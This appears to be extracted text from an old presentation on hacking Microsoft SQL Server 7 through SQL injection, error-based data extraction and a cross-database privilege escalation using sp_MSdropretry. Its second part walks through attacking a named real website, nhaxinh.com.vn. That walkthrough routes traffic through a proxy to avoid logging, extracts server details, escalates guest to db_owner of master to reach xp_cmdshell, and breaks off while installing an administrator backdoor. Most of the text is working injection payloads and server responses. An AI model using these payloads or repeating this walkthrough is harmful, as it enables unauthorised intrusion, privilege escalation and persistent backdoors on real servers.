Compromising an MsSql server via SqlInjection & CrossDatabase flaws


Document information:

Syntax error converting the nvarchar value Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3) to a column of data type int.
Content extracted from the document:
PART I: SQL HACKING TECHNIQUES
• sql injection
• convert magic
• cross database

DETECTING SQL INJECTION FLAWS
http://www.company.com/product/price.asp?id=1
select price from product where id=1
http://www.company.com/product/price.asp?id=1’
select price from product where id=1’
Unclosed quotation mark before the character string ‘
http://www.company.com/product/price.asp?id=[...]

THE CONVERT MAGIC TECHNIQUE
http://wwww.company.com/product/price.asp?id=1 and 1=convert(int,@@version)sp_password
select price from product where id=1 and 1=convert(int,@@version)sp_password
Syntax error converting the nvarchar value Microsoft SQL Server 7.00 - 7.00.623 (Intel X86) Nov 23 1998 21:08:09 Copyright (c) 1988-1998 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3) to a column of data type int.
sp_password was found in the text of this event. The text has been replaced with this comment for security reasons.
• @@servername, db_name(), system_user, ...
• ‘ “ ( )

THE MSSQL CROSS-DATABASE FLAW
use testdatabase
create proc dbo.test as select * from master.dbo.sysxlogins
go
exec test
select * from master.dbo.sysxlogins
• sa == dbo
• db_owner can create & design objects owned by dbo
• SID of proc dbo.test == SID of master.dbo.sysxlogins

THE INJECTION FLAW IN MASTER..SP_MSDROPRETRY
CREATE PROCEDURE sp_MSdropretry (@tname sysname, @pname sysname) as
declare @retcode int
/*** To public */
exec(drop table + @tname)
if @@ERROR 0 return(1)
exec(drop procedure + @pname)
if @@ERROR 0 return(1)
return(0)

PRIVILEGE ESCALATION VIA MASTER..SP_MSDROPRETRY
exec sp_executesql N create view dbo.test as select * from master.dbo.sysusers
exec sp_msdropretry xx update sysusers set sid=0x01 where name=dbo, xx
exec sp_msdropretry xx update dbo.test set sid=0x01, roles=0x01 where name=guest, xx
exec sp_executesql N drop view dbo.test
‘drop table xx update sysusers set sid=0x01 where name=dbo
drop procedure xx
drop table xx update dbo.test set sid=0x01, roles=0x01 where name=guest
drop table xx
• guest == db_owner of the master database

PART 2: SQL HACKING ILLUSTRATION
• Exploiting the sql injection flaw at nhaxinh.com.vn
• Some lessons learned when hacking SQL

THE SQL INJECTION FLAW AT NHAXINH.COM.VN
• use “proxy.ia2.marketscore.com:80” to avoid being logged
http://www.nhaxinh.com.vn/FullStory.asp?id=1
http://www.nhaxinh.com.vn/FullStory.asp?id=1’
Microsoft OLE DB Provider for ODBC Drivers error 80040e14
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string .
/Including/general.asp, line 840

DETERMINING THE VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server][SQL Server]Syntax error converting the nvarchar value Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright (c) 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) to a column of data type int.
/Including/general.asp, line 840

DETERMINING SERVER_NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value UNESCO to a column of data type int.
/Including/general.asp, line 840
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value NhaXinh to a column of data type int.
/Including/general.asp, line 840
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,system_user)
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value nhaxinh to a column of data type int.
/Including/general.asp, line 840
• user_name(): members of “sysadmin” are mapped to “dbo”

DETERMINING THE SQL SERVER PRIVILEGE LEVEL
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset(sqloledb,;;,)
Microsoft OLE DB Provider for ODBC Drivers error 80040e14
[Microsoft][ODBC SQL Server Driver][SQL Server]Ad hoc access to OLE DB provider sqloledb has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840
• the admin has disabled openrowset/sqloledb; it will be re-enabled later

ADDING GUEST TO DB_OWNER OF THE MASTER DATABASE
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N create view dbo.test as select * from master.dbo.sysusers exec sp_msdropretry xx update sysusers set sid=0x01 where name=dbo, xx exec sp_msdropretry xx update dbo.test set sid=0x01, roles=0x01 where name=guest, xx exec sp_executesql N drop view dbo.test
• Why? guest is db_owner of the master database, so guest can execute xp_regwrite or xp_cmdshell

CONFIRMING WHETHER GUEST IS NOW IN DB_OWNER OF THE MASTER DATABASE
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 name from master..sysusers where roles=0x01 and name not in(dbo)))
Microsoft OLE DB Provider for ODBC Drivers error 80040e07
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value guest to a column of data type int.
/Including/general.asp, line 840

INSTALLING A “BUILTIN\ADMINISTRATORS” BACKDOOR
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N create view dbo.test as select * from master.dbo.sysxl ...